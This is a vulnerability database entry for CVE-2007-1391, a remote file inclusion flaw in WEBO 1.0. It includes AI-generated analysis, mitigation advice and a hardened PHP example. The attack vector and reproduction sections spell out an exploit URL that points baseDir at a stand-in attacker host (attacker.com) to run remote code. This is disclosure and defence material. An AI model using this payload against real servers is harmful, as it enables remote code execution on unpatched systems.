CVE-2007-1391
Description
PHP remote file inclusion in WEBO (weborganizer) 1.0 allows arbitrary code execution via the baseDir parameter in modules/abook/foldertree.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A PHP remote file inclusion vulnerability exists in modules/abook/foldertree.php of Leo West WEBO (aka weborganizer) version 1.0. The script uses the baseDir parameter supplied via the URL without sanitizing it, which allows an attacker to include a remote file containing arbitrary PHP code [1].
Exploitation
The attacker needs only the ability to send an HTTP GET request to the vulnerable script. If the baseDir parameter is set to a crafted URL pointing to an external server hosting a malicious PHP payload, that file is included and executed. No authentication is required [1].
Impact
Successful exploitation results in remote code execution with the privileges of the web server. The attacker can execute arbitrary PHP commands, potentially gaining full control over the affected application and server [1].
Mitigation
No official patch or updated version has been released for this software. The application appears to be unmaintained or abandoned. As a workaround, if the file is not needed, remove or restrict access to modules/abook/foldertree.php, or disable the vulnerable functionality. This vulnerability is not listed on CISA's Known Exploited Vulnerabilities catalog [1].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on the $baseDir variable in an include_once() call allows remote file inclusion."
Attack vector
An attacker sends a crafted HTTP GET request to `modules/abook/foldertree.php` with the `baseDir` parameter set to a URL pointing to an attacker-controlled PHP script, e.g. `http://attacker.com/evil?` [ref_id=1]. When PHP's `register_globals` and `allow_url_fopen` are both enabled, the unsanitized `$baseDir` value is passed directly into `include_once()`, causing the remote file to be included and executed [ref_id=1].
Affected code
The vulnerable file is `modules/abook/foldertree.php` in WEBO (Web Organizer) 1.0. The file includes `"$baseDir/lib/HTML/tree.php"` without sanitizing the `$baseDir` variable [ref_id=1].
What the fix does
The advisory recommends sanitizing the `$baseDir` variable before it is used in the include statement, and turning off `register_globals` [ref_id=1]. No official patch is shown in the bundle; the remediation guidance is to properly validate or restrict the `$baseDir` input and disable dangerous PHP configuration options.
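As an added illustration, not code from WEBO or from the advisory, the include pattern described above is shown beside a hardened version that derives the base directory from the script's own location and refuses any request-supplied value; the directory layout (modules/abook/foldertree.php two levels below the application root) is assumed from the paths on this page.

```php
<?php
// Added example, not WEBO's code. The pattern the advisory describes:
// with register_globals on, ?baseDir=... silently becomes $baseDir, and with
// URL wrappers allowed for include, include_once() fetches and runs a remote file.
//
//   include_once("$baseDir/lib/HTML/tree.php");   // $baseDir is attacker-controlled
//
// Hardened form: an include path is never derived from request data.
// Matching php.ini settings: register_globals = Off, allow_url_include = Off.
declare(strict_types=1);

// 1. Fixed base directory computed from this file's own location
//    (assumed layout: modules/abook/foldertree.php -> application root).
$baseDir = realpath(__DIR__ . '/../..');
if ($baseDir === false) {
    http_response_code(500);
    exit('application root not found');
}

// 2. Defence in depth: a request that tries to supply baseDir at all is rejected
//    and logged, which also covers a legacy register_globals deployment.
if (isset($_GET['baseDir']) || isset($_POST['baseDir']) || isset($_COOKIE['baseDir'])) {
    error_log('foldertree.php: rejected request-supplied baseDir from '
        . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit('bad request');
}

// 3. Resolve the library path and confirm it still lies under the application root.
$target = realpath($baseDir . '/lib/HTML/tree.php');
$prefix = $baseDir . DIRECTORY_SEPARATOR;
if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
    http_response_code(500);
    exit('tree library missing');
}

require_once $target;
```

The error_log line gives a simple detection hook: any request carrying a baseDir parameter to this script is a probe for this issue and is worth alerting on.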
Preconditions
- config: PHP register_globals must be enabled
- config: PHP allow_url_fopen must be enabled
- network: attacker must be able to send HTTP requests to the target server
- input: the baseDir parameter is user-controllable via GET request
Reproduction
Visit `http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir=http://attacker.com/evil?` where the attacker's server hosts a malicious PHP script [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (6)
News mentions (0)
No linked articles in our index yet.